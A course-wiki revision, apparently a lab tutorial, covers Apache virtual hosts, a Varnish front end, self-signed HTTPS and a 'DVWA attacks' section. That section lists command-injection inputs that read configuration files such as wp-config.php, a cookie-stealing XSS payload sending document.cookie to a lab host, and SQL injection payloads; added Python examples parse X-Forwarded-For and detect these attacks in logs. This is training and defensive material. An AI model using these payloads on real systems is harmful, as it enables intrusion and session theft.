Virtualhost using apache2 as an example: Difference between revisions

From ICO wiki
Aelliku
Saus
Revision as of 11:44, 6 May 2013

/etc/hosts

192.168.56.101  www.planet.zz
192.168.56.101  sales.planet.zz
ping www.planet.zz

ping sales.planet.zz    


apt-get update     
apt-get dist-upgrade

apt-get install apache2

mkdir -p /var/www/www.planet.zz
mkdir -p /var/www/sales.planet.zz
cp /var/www/index.html /var/www/www.planet.zz
cp /var/www/index.html /var/www/sales.planet.zz
vim /var/www/www.planet.zz/index.html
vim /var/www/sales.planet.zz/index.html
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/www.planet.zz
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/sales.planet.zz

vim www.planet.zz 
vim sales.planet.zz 

a2ensite www.planet.zz
a2ensite sales.planet.zz 
service apache2 reload

Varnish

First we move apache2 to port 8080

/etc/apache2/ports.conf
NameVirtualHost *:8080
Listen 8080
cd /etc/apache2/sites-available
sed 's/:80/:8080/' default -i
sed 's/:80/:8080/' wp -i
sed 's/:80/:8080/' sales.planet.zz -i
sed 's/:80/:8080/' www.planet.zz -i
service apache2 restart
netstat -lntp
apt-get install varnish
vim /etc/default/varnish
DAEMON_OPTS="-a :80 \
             -T localhost:6082 \
             -f /etc/varnish/default.vcl \
             -S /etc/varnish/secret \
             -s malloc,256m"

Add the X-Forwarded-For setting to the file /etc/varnish/default.vcl

sub vcl_recv {
  # Add a unique header containing the client address
  remove req.http.X-Forwarded-For;
  set    req.http.X-Forwarded-For = client.ip;
  # [...]
}

service varnish restart
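Added example (Python, not from the original page) showing why the vcl_recv above removes the incoming X-Forwarded-For before setting it, and how code on the Apache side should read the header once Varnish is in front: it contrasts the overwrite used on this page with the append behaviour of many proxies, and resolves the client address by walking the chain from the right past trusted proxies. The trusted-proxy list, the client address 203.0.113.7 and the forged value 1.2.3.4 are constructed assumptions.

```python
import ipaddress
from typing import Optional

# Assumption for this example: Varnish on 127.0.0.1 is the only hop allowed to
# speak for the client; any other address in X-Forwarded-For is untrusted input.
TRUSTED_PROXIES = [ipaddress.ip_network("127.0.0.1/32")]


def is_trusted(ip: str) -> bool:
    """True if the address belongs to one of our own proxies."""
    return any(ipaddress.ip_address(ip) in net for net in TRUSTED_PROXIES)


def overwrite_xff(client_ip: str, incoming_xff: Optional[str]) -> str:
    """What the vcl_recv on this page does: drop the incoming header, set client.ip."""
    return client_ip


def append_xff(client_ip: str, incoming_xff: Optional[str]) -> str:
    """What many proxies do by default: keep what the client sent and add one hop."""
    return f"{incoming_xff}, {client_ip}" if incoming_xff else client_ip


def naive_first_hop(xff: str) -> str:
    """The common mistake: trust the left-most entry, which the client controls."""
    return xff.split(",")[0].strip()


def real_client_ip(remote_addr: str, xff: Optional[str]) -> str:
    """Walk the chain from the right, skipping our proxies; the first untrusted
    address is the client. Fall back to the TCP peer if the chain is unusable."""
    if not is_trusted(remote_addr):
        return remote_addr          # direct connection: the header means nothing
    hops = [h.strip() for h in (xff or "").split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            ipaddress.ip_address(hop)
        except ValueError:
            break                   # malformed entry: stop trusting the chain
        if not is_trusted(hop):
            return hop
    return remote_addr
```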


Configuring HTTPS

ssh-keygen


Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /etc/ssl/private/www.planet.zz.key

Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /etc/ssl/private/www.planet.zz.key.
Your public key has been saved in /etc/ssl/private/www.planet.zz.key.pub.
The key fingerprint is:
76:6e:6a:b4:1b:75:7e:39:18:12:59:ee:9c:4c:b9:ef root@server
The key's randomart image is:
+--[ RSA 2048]----+
|            .    |
|           + .   |
|          o +    |
|           * o   |
|        S + O    |
|       ..+ + + . |
|       ...o o =  |
|        o+   o . |
|       .o.    E  |
+-----------------+

openssl req -new -key /etc/ssl/private/www.planet.zz.key -out /root/www.planet.zz.req


sudo openssl x509 -req -days 3650 -in /root/www.planet.zz.req -signkey /etc/ssl/private/www.planet.zz.key -out /etc/ssl/certs/www.planet.zz.pem

Signature ok
subject=/C=EE/ST=Harjumaa/L=Tallinn/O=Planet/OU=IT/CN=www.planet.zz
Getting Private key

cp /etc/apache2/sites-available/default-ssl /etc/apache2/sites-available/www.planet.zz-ssl

Change the contents there (certificate, document root, key file)

Add ServerName, change DocumentRoot, change SSLCertificateFile and SSLCertificateKeyFile

ServerName      www.planet.zz
DocumentRoot /var/www/www.planet.zz
SSLCertificateFile    /etc/ssl/certs/www.planet.zz.pem
SSLCertificateKeyFile /etc/ssl/private/www.planet.zz.key


a2enmod ssl

a2ensite www.planet.zz-ssl

service apache2 restart

ID card

ID card authentication with the Apache2 web server


DVWA attacks

cmd exec

8.8.8.8; sed 's/</UUUU/' ../../config/config.inc.php


8.8.8.8; ls -l 
8.8.8.8; ls -l ../
8.8.8.8; ls -l ../../
# etc., until all files/directories are known
8.8.8.8; sed 's/<//'  ../../../../wordpress/wp-config.php


I create the file kala in the /var/tmp directory

8.8.8.8; touch /var/tmp/kala.txt

And check whether the file was created

8.8.8.8; ls /var/tmp/


How to find out whether cookies are available to JavaScript or not. The solution uses command execution (no XSS hole was found, so it cannot be used, ...)

; grep session.cookie_httponly /etc/php5/apache2/php.ini

Output:

  • if cookies are not readable by JavaScript, the output is:

session.cookie_httponly = 1

  • if cookies are readable by JavaScript, the output is as follows (HINT: act quickly! :))

session.cookie_httponly = 0

XSS

<script>var i='<img src="http://192.168.56.101/'+document.cookie+'" />'; document.write(i);</script>

more XSS

%3Cscript%3Evar+i%3D%27%3Cimg+src%3D%22http%3A%2F%2F192.168.56.101%2F%27%2Bdocument.cookie%2B%27%22+%2F%3E%27%3B+document.write%28i%29%3B%3C%2Fscript%3E

SQLi

#blind
1' union select BENCHMARK(100000000,ENCODE('hello','goodbye')),1; # --


2' union select TABLE_SCHEMA, TABLE_NAME from information_schema.tables;# --


3' union  select TABLE_NAME,COLUMN_NAME from information_schema.columns; # --
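As an added defensive example for the command-execution, XSS and SQLi payloads above (Python, not part of the original wiki page): a small scanner that decodes the query string of Apache access-log lines and flags the attack classes used on this page, including the URL-encoded XSS form. The log lines, the /dvwa/... paths and the signatures are constructed assumptions; all three requests are written as GET for illustration, since a form submitted with POST leaves no body in the access log.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in Apache common log format. The query strings carry
# the payloads shown on this page; the XSS one is in its URL-encoded form.
SAMPLE_LOG = """\
192.168.56.1 - - [06/May/2013:11:40:01 +0300] "GET /dvwa/vulnerabilities/exec/?ip=8.8.8.8%3B+ls+%2Fvar%2Ftmp%2F HTTP/1.1" 200 1532
192.168.56.1 - - [06/May/2013:11:41:12 +0300] "GET /dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Evar+i%3D%27%3Cimg+src%3D%22http%3A%2F%2F192.168.56.101%2F%27%2Bdocument.cookie%2B%27%22+%2F%3E%27%3B+document.write%28i%29%3B%3C%2Fscript%3E HTTP/1.1" 200 1701
192.168.56.1 - - [06/May/2013:11:42:30 +0300] "GET /dvwa/vulnerabilities/sqli/?id=2%27+union+select+TABLE_SCHEMA%2C+TABLE_NAME+from+information_schema.tables%3B%23+-- HTTP/1.1" 200 4410
192.168.56.1 - - [06/May/2013:11:43:05 +0300] "GET /dvwa/vulnerabilities/exec/?ip=8.8.8.8 HTTP/1.1" 200 1490
"""

# client, method, request target and status from a common-log-format line
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# One signature per attack class seen on this page, applied to the decoded query.
SIGNATURES = {
    "command-injection": re.compile(r"(?:;|&&|\|\|?)\s*(?:ls|cat|sed|grep|touch)\b"),
    "xss": re.compile(r"<\s*script\b|document\.cookie", re.I),
    "sqli": re.compile(r"'\s*union\s+select\b|information_schema\.|benchmark\s*\(", re.I),
}


def classify(query: str):
    """Return the attack classes whose signature matches the decoded query string."""
    decoded = unquote_plus(query)   # %3C -> '<', '+' -> ' ', as the browser sent it
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan_log(text: str):
    """Return (client_ip, path, classes) for every request that looks like an attack."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, _method, target, _status = m.groups()
        path, _, query = target.partition("?")
        classes = classify(query)
        if classes:
            hits.append((ip, path, classes))
    return hits
```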